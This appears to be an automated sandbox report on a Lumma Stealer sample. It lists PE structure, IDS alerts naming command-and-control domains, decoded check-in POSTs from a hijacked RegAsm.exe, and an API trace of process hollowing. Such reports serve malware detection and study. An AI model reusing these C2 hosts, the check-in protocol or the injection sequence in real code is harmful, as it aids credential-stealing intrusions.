add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5cde8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5e000	0x5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x60000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5ccb0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x5ae44	0x5b000	b5a99c3fd656a76b5979c1e150746bf6	False	0.9937113667582418	data	7.995414657968518	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x5e000	0x5c8	0x600	a589a4206018b0dca6ae47d5c97f9001	False	0.4375	data	4.119926545451393	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x60000	0xc	0x200	ef500bd10f72fd04b5e7aed0b41ff3fd	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x5e0a0	0x334	data			0.4426829268292683
RT_MANIFEST	0x5e3d8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T16:47:12.119062+0200	2056048	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lootebarrkeyn .shop)	1	192.168.2.6	64503	1.1.1.1	53	UDP
2024-09-27T16:47:12.136915+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.6	51246	1.1.1.1	53	UDP
2024-09-27T16:47:12.707321+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.6	49711	104.21.4.136	443	TCP
2024-09-27T16:47:13.162369+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49711	104.21.4.136	443	TCP
2024-09-27T16:47:13.162369+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49711	104.21.4.136	443	TCP
2024-09-27T16:47:13.840862+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.6	49712	104.21.4.136	443	TCP
2024-09-27T16:47:14.311281+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49712	104.21.4.136	443	TCP
2024-09-27T16:47:14.311281+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49712	104.21.4.136	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 16:47:12.193546057 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:12.193608046 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:12.193736076 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:12.242222071 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:12.242259026 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:12.707185984 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:12.707320929 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:12.750689030 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:12.750713110 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:12.751080990 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:12.796518087 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.039410114 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.039541006 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.039602041 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.162401915 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.162458897 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.162489891 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.162513971 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.162544012 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.162573099 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.162587881 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.162604094 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.162646055 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.184073925 CEST	49711	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.184113026 CEST	443	49711	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.363136053 CEST	49712	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.363173008 CEST	443	49712	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.363290071 CEST	49712	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.363656998 CEST	49712	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.363672972 CEST	443	49712	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.840595007 CEST	443	49712	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.840862036 CEST	49712	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.842221975 CEST	49712	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.842233896 CEST	443	49712	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.842479944 CEST	443	49712	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:13.843904972 CEST	49712	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.843931913 CEST	49712	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:13.843981981 CEST	443	49712	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:14.311300039 CEST	443	49712	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:14.311420918 CEST	443	49712	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:14.311512947 CEST	49712	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:14.316138029 CEST	49712	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:14.316159010 CEST	443	49712	104.21.4.136	192.168.2.6
Sep 27, 2024 16:47:14.316174984 CEST	49712	443	192.168.2.6	104.21.4.136
Sep 27, 2024 16:47:14.316180944 CEST	443	49712	104.21.4.136	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 16:47:12.119061947 CEST	64503	53	192.168.2.6	1.1.1.1
Sep 27, 2024 16:47:12.127742052 CEST	53	64503	1.1.1.1	192.168.2.6
Sep 27, 2024 16:47:12.136914968 CEST	51246	53	192.168.2.6	1.1.1.1
Sep 27, 2024 16:47:12.153501034 CEST	53	51246	1.1.1.1	192.168.2.6
Sep 27, 2024 16:47:36.726321936 CEST	53	64499	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 16:47:12.119061947 CEST	192.168.2.6	1.1.1.1	0x9cc6	Standard query (0)	lootebarrkeyn.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 16:47:12.136914968 CEST	192.168.2.6	1.1.1.1	0xb6b6	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 16:47:12.127742052 CEST	1.1.1.1	192.168.2.6	0x9cc6	Name error (3)	lootebarrkeyn.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 27, 2024 16:47:12.153501034 CEST	1.1.1.1	192.168.2.6	0xb6b6	No error (0)	gutterydhowi.shop		104.21.4.136	A (IP address)	IN (0x0001)	false
Sep 27, 2024 16:47:12.153501034 CEST	1.1.1.1	192.168.2.6	0xb6b6	No error (0)	gutterydhowi.shop		172.67.132.32	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gutterydhowi.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	104.21.4.136	443	5344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 14:47:13 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-27 14:47:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-27 14:47:13 UTC	553	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 14:47:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SlFWPsXhPPAGi3SCzPpkxQ%2FS%2BDhM0epQn2Hhl8zJYzCNBIBz24qKNoS2nNkY29ASGkL8AD4yTVpFxAiiapvKHrGJ7MjPpKlTEOE2Bpv4kA%2FPNvolIvgkUWTUqFENIZTHtUOQvg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9c49a2ed360f80-EWR
2024-09-27 14:47:13 UTC	816	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-27 14:47:13 UTC	1369	IN	Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
2024-09-27 14:47:13 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 30 41 4c 78 39 61 73 32 31 50 30 77 67 6e 4d 61 41 77 67 72 35 65 45 5a 42 55 78 34 6c 6a 71 44 78 37 78 5a 31 6a 52 34 39 4a 49 2d 31 37 32 37 34 34 38 34 33 33 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 Data Ascii: <input type="hidden" name="atok" value="0ALx9as21P0wgnMaAwgr5eEZBUx4ljqDx7xZ1jR49JI-1727448433-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-09-27 14:47:13 UTC	851	IN	Data Raw: 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare<
2024-09-27 14:47:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49712	104.21.4.136	443	5344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 14:47:13 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=0ALx9as21P0wgnMaAwgr5eEZBUx4ljqDx7xZ1jR49JI-1727448433-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: gutterydhowi.shop
2024-09-27 14:47:13 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=FATE99--&j=
2024-09-27 14:47:14 UTC	776	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 14:47:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tas7jdesfl7g3va072f5ge7npm; expires=Tue, 21 Jan 2025 08:33:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qB52WkxF%2F76dignHyy4iqz83xTZkzHex0NtoX79%2FhWKwoGLrwXbCHaBUdwrTQKaw7MKOYNQfr5utA6jHCp%2Fu8g8DwZBD%2F88oyxJXLtnTGXBTzSlJ1AHfUcLKasKAXuvDQ13nww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9c49a819ed436d-EWR
2024-09-27 14:47:14 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-27 14:47:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	1
Start time:	10:47:09
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\FoS5cjKhd3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FoS5cjKhd3.exe"
Imagebase:	0x980000
File size:	375'296 bytes
MD5 hash:	3B2250172CDC65F249533AD138EF8AB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:47:09
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:47:10
Start date:	27/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x750000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:47:13
Start date:	27/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1768
Imagebase:	0x290000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:47:13
Start date:	27/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1772
Imagebase:	0x290000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	36.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02CD2151 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02CD20C3,02CD20B3), ref: 02CD22C0
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02CD22D3
Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 02CD22F1
ReadProcessMemory.KERNELBASE(0000008C,?,02CD2107,00000004,00000000), ref: 02CD2315
VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 02CD2340
WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 02CD2398
WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 02CD23E3
WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 02CD2421
Wow64SetThreadContext.KERNEL32(0000009C,02BB0000), ref: 02CD245D
ResumeThread.KERNELBASE(0000009C), ref: 02CD246C

Strings

CreateProcessA, xrefs: 02CD2205
VirtualAlloc, xrefs: 02CD2218
GetP, xrefs: 02CD21D3
GetThreadContext, xrefs: 02CD222B
TerminateProcess, xrefs: 02CD234F
WriteProcessMemory, xrefs: 02CD2264
ResumeThread, xrefs: 02CD228D
ress, xrefs: 02CD21DB
SetThreadContext, xrefs: 02CD2277
VirtualAllocEx, xrefs: 02CD2251
aryA, xrefs: 02CD2197
Load, xrefs: 02CD218F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02CD22BF
ReadProcessMemory, xrefs: 02CD223E

Memory Dump Source

Source File: 00000001.00000002.2204496726.0000000002CD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2cd1000_FoS5cjKhd3.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 836fffbc43540285a933d6f4afd58748600d289302b1a743fb915e9676a778f8
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 8DB1E67664024AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA51CB94

Function 02B60C40 Relevance: .3, Instructions: 321
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2204414975.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_FoS5cjKhd3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8931af5fd1b254b5126aae21598f879d19b9e8a96944c5dd275617a438abedb7
Instruction ID: 3f0451c98f8db38d96b47804c014bf079dcc05b8087778d360f2c071342d9576
Opcode Fuzzy Hash: 8931af5fd1b254b5126aae21598f879d19b9e8a96944c5dd275617a438abedb7
Instruction Fuzzy Hash: 9BD18A70A042599FCB01DFA9C8947EDFBF2BF48314F2489A9E855E7255C739AC41CBA0

Function 02B61218 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 02B612A0

Memory Dump Source

Source File: 00000001.00000002.2204414975.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_FoS5cjKhd3.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7ae1a39d0431eceae6b73454ddc62abc205a5f21cf04842c12939140fa54eb14
Instruction ID: a0f81f6c7e0c7f8bc8ccbe7c88114824b286ac56e4746d3ab54942605cd27eeb
Opcode Fuzzy Hash: 7ae1a39d0431eceae6b73454ddc62abc205a5f21cf04842c12939140fa54eb14
Instruction Fuzzy Hash: 562104B1D102599FDB10DFAAD884AEEBBF1FF88314F10842AE959A7250C7795904CFA1

Function 02B61220 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 02B612A0

Memory Dump Source

Source File: 00000001.00000002.2204414975.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_FoS5cjKhd3.jbxd

Similarity
